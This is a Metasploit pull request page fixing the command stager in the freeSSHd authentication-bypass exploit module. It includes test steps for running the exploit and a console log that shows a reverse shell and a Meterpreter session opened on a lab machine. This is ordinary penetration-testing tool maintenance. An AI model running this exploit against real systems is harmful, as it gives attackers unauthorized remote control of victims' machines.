Use the Msf::Exploit::CmdStager mixin. Fixes #8092. #8095

Merged
merged 3 commits into from Mar 12, 2017

Conversation

pbarry-r7
Contributor

@pbarry-r7 pbarry-r7 commented Mar 11, 2017

Update the freesshd_authbypass module so it can locate the vbs_b64 command stager.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Get a session on an exploitable target.
  • use exploit/windows/ssh/freesshd_authbypass
  • Set RHOST, RPORT, USERNAME options accordingly.
  • run
  • Verify the exploit runs without throwing an Errno::ENOENT error.

@wvu wvu self-assigned this Mar 12, 2017
Update freesshd_authbypass to use CmdStager fully
@wvu
Contributor

wvu commented Mar 12, 2017

msf exploit(freesshd_authbypass) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] 192.168.33.129:2222 - Trying username '[redacted]'
[*] 192.168.33.129:2222 - Uploading payload, this may take several minutes...
[*] 192.168.33.129:2222 - Command Stager progress -   1.66% done (1699/102108 bytes)
[snip]
[*] Sending stage (957487 bytes) to 192.168.33.129
[*] 192.168.33.129:2222 - Command Stager progress - 100.00% done (102108/102108 bytes)
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:33920) at 2017-03-11 22:09:52 -0600

meterpreter > getuid
Server username: ubuntu\[redacted]
meterpreter > sysinfo
Computer        : ubuntu
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x64
System Language : en_US
Domain          : ubuntu
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

Note: this is Wine.

wvu added a commit to wvu/metasploit-framework that referenced this pull request Mar 12, 2017
@wvu wvu merged commit bc9aa14 into rapid7:master Mar 12, 2017
@wvu
Contributor

wvu commented Mar 15, 2017

Release Notes

The command stager in exploit/windows/ssh/freesshd_authbypass has been fixed so that it can find the VBS decoder that was moved to the rex-exploitation gem.

@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Mar 22, 2017
Labels
bug module rn-fix release notes fix